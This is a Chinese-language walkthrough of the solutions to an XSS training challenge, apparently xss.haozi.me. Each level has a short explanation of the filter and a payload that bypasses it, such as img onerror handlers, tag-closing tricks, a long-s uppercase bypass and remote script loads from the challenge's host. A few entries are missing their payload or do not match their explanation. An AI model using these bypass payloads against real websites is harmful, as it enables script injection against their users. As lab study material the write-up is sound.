0X00
# 此题代码在<div>元素中,因此可以直接将<script>alert(1)</script>插进语句进行注入
<script>alert(1)</script>
0X01
# 此题是因为</textarea>属于文本域,不可以在中间直接插入数据,因此需要用</textarea>来进行闭合
'</textarea>'<script>alert(1)</script>
0X02
# 看代码可知闭合方式是' "> 所以直接闭合即可
'"><script>alert(1)</script>
0X03
# 看代码可知,使用了正则过滤圆括号和方括号,我们需要用反引号来绕过
0X04
# 此题我们看到源代码把()~都过滤掉了,因此只能用html实体编码的方式来解答此题
<IMG SRC=""onerror=alert(1)>
0X05
# 此题需要绕过html的注释符,只有输入中包含字符串 “–>” 才会被替换为笑脸表情符号 “😂”,只要输入中不包含 “–>” 这个字符串,就可以绕过这个函数的替换操作。
0X06
# 此关的意思是在html中出现“auto”、“on.*=”、“>” 字符替换为下划线(“_”)
首先我们需要注意是闭合,既然无法闭合,我们就需要使用input类型中的image属性
然后再用转义将其‘=’换到下一行即可
type = 'image' src = '' onerror
=alert(1)
0X07
# 可以看到源代码中使用的是正则表达式中的匹配原则,每个字符的出现到第二次出现会把中间的内容过滤掉,所以我们使用>
<img src=“123” onerror="alert(1)"
0X08
# 此题是过滤了</style>,导致我们无法闭合,我们可以通过换行来闭合
</style
><img src= "" onerror="alert(1)">
0x09
# 此关是告诉我们必须输入和他一样的内容,不然就进入else语句,因此我们需要把前面的内容输进去,然后再执行自己的语句
https://www.segmentfault.com"></script><img src="" onerror="alert(1)"><script>
0X0A
# 此题它把题目中的五个符号都替换了,所以还需要URL来解释后面的语句。
https://www.segmentfault.com.haozi.me/j.js
0X0B
# toUpperCase是将所有的小写字母全部换成大写字母,而js中对大小写非常敏感,所以我们需要采用实体编码的方式将它们转化,这样就不会产生报错。
<img src="" onerror="alert(1)">
0X0C
# 这道题既然把<script>全部替换为空,那么我们就可以不使用其方法,然后针对于toUpperCase,我们可以通过编码的方式实现。
<img src="" onerror="alert(1)">
0X0D
# 此方法是将左<进行了过滤,因此我们使用右<来处理,输入内容即可。
1
alert(1)
-->
0X0E
# 此题需要将所有的大小写字母全部替换掉,所以我们需要用f来处理,并且还会将小写字母换为大写。
<ſcript/ſrc="https://xss.haozi.me/j.js"></ſcript>
0X0F
# 此题限制了我们必须在img标签中,而且还将符号换成了字符,因此我们需要将console.error给她闭合掉,然后执行语句
');alert('1
0X10
# 这个题直接给出在<script>中输入,所以直接输入即可。
alert(1)
0X11
# 此题也是将好多的符号给替换掉了 ,所以我们先将console.log注释掉,然后再进行注入,最后将后面的注释掉。
");alert(1)//
0X12
# 此题我们是将”替换成了//,首先我们把console.log先闭合掉,然后再将//换成“即可
\");alert(1);//
好了,直接通杀!!!!!!